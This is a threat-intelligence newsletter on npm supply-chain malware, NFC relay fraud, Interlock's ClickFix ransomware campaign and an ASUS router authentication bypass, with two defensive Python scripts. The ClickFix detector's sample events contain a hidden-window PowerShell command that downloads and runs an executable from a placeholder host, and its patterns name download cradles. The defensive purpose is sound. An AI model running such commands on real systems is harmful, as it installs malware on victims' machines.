ARTICLE
25 April 2025

Ankura CTIX FLASH Update - April 22, 2025

Ankura Consulting Group LLC

Contributor

Ankura Consulting Group, LLC is an independent global expert services and advisory firm that delivers end-to-end solutions to help clients at critical inflection points related to conflict, crisis, performance, risk, strategy, and transformation. Ankura consists of more than 1,800 professionals and has served 3,000+ clients across 55 countries. Collaborative lateral thinking, hard-earned experience, and multidisciplinary capabilities drive results and Ankura is unrivalled in its ability to assist clients to Protect, Create, and Recover Value. For more information, please visit, ankura.com.

Malware Activity

Unraveling the Web of Cyber Threats: From Malicious Packages to NFC Exploits

Recent cybersecurity investigations have unveiled a troubling array of threats endangering users and organizations alike. Researchers have uncovered malicious npm packages posing as Telegram bot libraries that were designed to steal sensitive data, including bot API keys and credentials, from the applications that import them. The rogue packages, named "messenger", "telebot", and "bot-sdk", were disguised to avoid detection, which again raises concerns about how much trust can be placed in open-source package registries. Meanwhile, a newly discovered Android malware called "Supercard X" is designed to use stolen payment card data in NFC relay attacks: the malware relays the victim's contactless card data to an attacker-controlled device, which then makes contactless payments as if the card were present, so the attacker steals from the victim without ever possessing the physical card. Security experts warn that the malware not only highlights weaknesses in how contactless payment flows are secured but also poses a significant risk to consumers' financial security. In a concerning turn of events, attackers are reportedly abusing a Russian bulletproof hosting service to launch campaigns that mainly target cryptocurrency exchanges and other financial platforms. Such services are designed to shield cybercriminals from law enforcement and takedown requests and have become a key component in the ongoing rise of ransomware and phishing operations. Experts warn that the anonymity these hosting services provide significantly complicates efforts to trace and prosecute cybercriminals. Lastly, a recent investigation uncovered a multi-stage malware attack that leverages encoded JScript (.jse) files, which Windows Script Host executes when opened, and several follow-on malware families, reaching users primarily through malicious email attachments. The attack begins with a phishing email that tricks victims into opening a JSE attachment, which then retrieves and executes additional payloads, including information stealers and remote access tools.
Considering these evolving threats, it is paramount for developers and consumers to exercise caution, bolster their security practices, and enhance their vigilance against potential attacks. CTIX analysts will continue to report on the latest malware strains and attack methodologies.
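One concrete check a developer can run against the npm supply-chain risk described above is a lockfile audit. The script below is an added example written for this update; it is not Ankura's tooling and not code from any of the reports summarised here. It walks a `package-lock.json` in the v2/v3 format, where npm records `hasInstallScript: true` for packages that run install hooks, and flags three things: package names on a denylist (the three rogue names from the text), packages with install scripts, and tarballs resolved from somewhere other than the public registry. The lockfile it parses is constructed for the example; the project name, the `left-pad-ish` package and the `mirror.invalid` host are hypothetical.

```python
"""Audit a package-lock.json (lockfile v2/v3) for the supply-chain red flags
discussed above. SAMPLE_LOCK is constructed for this example; the denylisted
names come from the text, every other package and host is hypothetical."""
import json
from typing import List, Tuple

# Rogue package names reported in the text as Telegram-bot lookalikes.
DENYLIST = {"messenger", "telebot", "bot-sdk"}
REGISTRY_PREFIX = "https://registry.npmjs.org/"

SAMPLE_LOCK = json.dumps({
    "name": "demo-bot",
    "lockfileVersion": 3,
    "packages": {
        # The empty key is the root project itself.
        "": {"name": "demo-bot",
             "dependencies": {"telegraf": "^4.16.0", "bot-sdk": "1.0.3"}},
        "node_modules/telegraf": {
            "version": "4.16.3",
            "resolved": "https://registry.npmjs.org/telegraf/-/telegraf-4.16.3.tgz",
        },
        "node_modules/bot-sdk": {
            "version": "1.0.3",
            "resolved": "https://registry.npmjs.org/bot-sdk/-/bot-sdk-1.0.3.tgz",
            "hasInstallScript": True,   # npm sets this for pre/post/install hooks
        },
        "node_modules/left-pad-ish": {
            "version": "0.0.1",
            "resolved": "http://mirror.invalid/left-pad-ish-0.0.1.tgz",
        },
    },
})


def package_name(path: str) -> str:
    """Map a lockfile path such as 'node_modules/a/node_modules/@s/b' to '@s/b'."""
    idx = path.rfind("node_modules/")
    return path[idx + len("node_modules/"):] if idx != -1 else path


def audit_lockfile(text: str) -> List[Tuple[str, str]]:
    """Return (package, reason) pairs for every red flag found in the lockfile."""
    lock = json.loads(text)
    findings: List[Tuple[str, str]] = []
    for path, meta in lock.get("packages", {}).items():
        if path == "":
            continue  # skip the root project entry
        name = package_name(path)
        if name in DENYLIST:
            findings.append((name, "denylisted name"))
        if meta.get("hasInstallScript"):
            findings.append((name, "runs an install script"))
        resolved = meta.get("resolved", "")
        if resolved and not resolved.startswith(REGISTRY_PREFIX):
            findings.append((name, f"non-registry source {resolved}"))
    return findings


if __name__ == "__main__":
    for pkg, reason in audit_lockfile(SAMPLE_LOCK):
        print(f"{pkg}: {reason}")
```

In a real pipeline the denylist would be fed from the advisory's full indicator list rather than three names, and an install-script hit is a prompt to read the hook, not proof of compromise; many legitimate native modules use one. Replace `SAMPLE_LOCK` with the contents of the project's own lockfile to run it for real.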

Threat Actor Activity

Interlock Ransomware Gang Utilizing ClickFix Attack to Push Ransomware

The Interlock ransomware gang has adopted ClickFix attacks, a social engineering tactic, to breach corporate networks and deploy file-encrypting malware. ClickFix deceives victims into executing malicious PowerShell commands themselves, under the guise of fixing an error or verifying their system, so the malware is installed by the user rather than by an exploit. Interlock's use of ClickFix marks a growing trend of threat actors employing this method. Launched in late September 2024, Interlock targets FreeBSD servers and Windows systems. It does not operate as a ransomware-as-a-service model but maintains a dark web data leak portal to pressure victims into paying ransoms ranging from hundreds of thousands to millions of dollars. Previously, Interlock used fake browser and VPN client updates to gain initial access. As of January 2025, researchers observed Interlock using ClickFix: the group hosted fake CAPTCHA prompts on URLs mimicking Microsoft and Advanced IP Scanner portals, instructing users to execute commands to verify themselves and download the promoted tools. Only the site impersonating Advanced IP Scanner led to a malicious installer. Its "Fix it" button copies a malicious PowerShell command to the victim's clipboard which, when pasted and executed, downloads a 36 MB PyInstaller payload. At the same time the legitimate Advanced IP Scanner site is opened to reduce suspicion. The payload installs the genuine software and executes an embedded PowerShell script in a hidden window, registering a Run key for persistence and exfiltrating system information such as OS version and user privileges. Researchers observed the command and control (C2) server delivering various payloads, including LummaStealer, BerserkStealer, keyloggers, and Interlock RAT, a simple trojan for file exfiltration and shell command execution. Interlock operators use stolen credentials for lateral movement via RDP, with tools like PuTTY, AnyDesk, and LogMeIn aiding the intrusion.
Before the ransomware is executed, stolen files are uploaded to attacker-controlled Azure Blob storage. The Windows variant of Interlock is also scheduled to run daily at 8:00 PM as a redundancy measure, and is written so that files already encrypted are not encrypted a second time. The ransom note has evolved and now emphasizes the legal and regulatory consequences of the data breach for the victim. ClickFix attacks are increasingly used by various threat actors, including other ransomware gangs and the North Korean Lazarus group, which has aimed them at job seekers in the cryptocurrency sector.
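The ClickFix chain above leaves a recognisable trail in endpoint telemetry: a script host launched by explorer.exe (the Run dialog) with a hidden-window switch or download cradle on its command line, a RunMRU registry entry recording what was pasted into Win+R, and a Run key pointing at a user-writable directory. The detector below is an added example written for this update, not Ankura's or any vendor's detection content. It runs three such heuristics over simplified Sysmon-style events (event ID 1 for process creation, event ID 13 for registry value set). The events are constructed for the example; the `lure.invalid` host, the user SID and the file paths are hypothetical placeholders, not indicators from the reporting.

```python
"""Heuristics for the ClickFix-to-persistence chain, run over simplified
Sysmon-style events (id 1 = process creation, id 13 = registry value set).
SAMPLE_EVENTS are constructed for this example and are not real telemetry."""
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


# Script hosts a ClickFix lure typically tells the victim to paste a command into.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
INTERPRETER_RE = re.compile(r"\b(powershell|pwsh|cmd|mshta)(\.exe)?\b", re.IGNORECASE)

# Hidden-window switches, encoded commands and download-and-execute cradles.
CRADLE_RE = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|\biwr\b|invoke-webrequest"
    r"|downloadstring|invoke-expression|\biex\b|frombase64string)",
    re.IGNORECASE,
)
RUNMRU_RE = re.compile(r"\\Explorer\\RunMRU\\", re.IGNORECASE)      # Win+R history
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)  # autostart value
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.IGNORECASE)

SAMPLE_EVENTS: List[Dict] = [
    # Victim pastes the clipboard command into the Run dialog (parent is explorer.exe).
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmd": r'powershell -w hidden -c "iwr http://lure.invalid/Advanced_IP_Scanner.exe -OutFile $env:TEMP\a.exe; & $env:TEMP\a.exe"'},
    # Explorer records what was typed into Win+R under RunMRU.
    {"id": 13, "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "details": r'powershell -w hidden -c "iwr http://lure.invalid/Advanced_IP_Scanner.exe -OutFile $env:TEMP\a.exe; & $env:TEMP\a.exe"\1'},
    # The embedded script registers a Run key pointing into the user profile.
    {"id": 13, "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater",
     "details": r"C:\Users\alice\AppData\Roaming\updater\svc.exe"},
    # Benign: an admin running a cmdlet from Windows Terminal is not flagged.
    {"id": 1, "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "parent": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_8wekyb3d8bbwe\WindowsTerminal.exe",
     "cmd": "pwsh -NoProfile -Command Get-Service"},
    # Benign: a Run key pointing at Program Files is not flagged.
    {"id": 13, "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"},
]


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def check_process(ev: Dict) -> List[Finding]:
    """Rule 1: interpreter spawned by explorer.exe with a cradle or hidden-window switch."""
    if _base(ev.get("parent", "")) != "explorer.exe" or _base(ev.get("image", "")) not in INTERPRETERS:
        return []
    m = CRADLE_RE.search(ev.get("cmd", ""))
    if not m:
        return []
    return [Finding("clickfix_run_dialog_cradle", f"'{m.group(0).strip()}' in: {ev['cmd']}")]


def check_registry(ev: Dict) -> List[Finding]:
    """Rule 2: RunMRU entry holding an interpreter command.
    Rule 3: Run key whose target lives in a user-writable location."""
    target, details = ev.get("target", ""), ev.get("details", "")
    out: List[Finding] = []
    if RUNMRU_RE.search(target) and INTERPRETER_RE.search(details):
        out.append(Finding("runmru_interpreter_command", details))
    if RUN_KEY_RE.search(target) and USER_WRITABLE_RE.search(details):
        out.append(Finding("run_key_user_writable_path", f"{target} -> {details}"))
    return out


def analyze(events: List[Dict]) -> List[Finding]:
    """Apply the rule matching each event type and collect the findings in order."""
    findings: List[Finding] = []
    for ev in events:
        if ev.get("id") == 1:
            findings += check_process(ev)
        elif ev.get("id") == 13:
            findings += check_registry(ev)
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.detail}")
```

Rule 1 on its own would also fire on a user who legitimately pastes an Invoke-WebRequest one-liner into Win+R, so in production it is the combination with a RunMRU hit and a later Run-key write from the same session that justifies an alert; the three rules are kept separate here so each artifact can be tuned independently. Real Sysmon events carry these fields under names such as ParentImage, CommandLine, TargetObject and Details, which a collector would map onto the keys used above.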

Vulnerabilities

Critical AiCloud Authentication Bypass Vulnerability in ASUS Routers Receives Patch

ASUS has disclosed a critical authentication bypass vulnerability affecting multiple router models with AiCloud enabled, which could allow remote attackers to execute unauthorized functions without authentication by sending specially crafted requests. The flaw, tracked as CVE-2025-2492 (CVSS 9.2/10), stems from improper authentication controls in the firmware and impacts devices running firmware branches 3.0.0.4_382, _386, _388, and 3.0.0.6_102. AiCloud is a cloud-style feature that lets users reach files and media on USB drives attached to the router from outside the network; because it exposes the router to the internet, an affected device is reachable by an attacker without any foothold on the LAN. While no active exploitation or public proof-of-concept (PoC) has been reported, ASUS strongly urges users to apply the latest firmware updates immediately, available through the support portal or product finder page, and to use strong, unique passwords for both wireless and administrative access. For end-of-life products, or where patching is not feasible because of its impact on critical business processes, ASUS recommends disabling AiCloud and all externally reachable services, including remote access from the WAN, DDNS, the VPN server, DMZ, port forwarding, port triggering, and FTP, to reduce the attack surface and mitigate exploitation risk. CTIX analysts urge all administrators to prioritize mitigating this vulnerability by patching or by following the manual defensive measures listed in the advisory, and to confirm after the change that none of these services still answers on the router's WAN address.

The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.
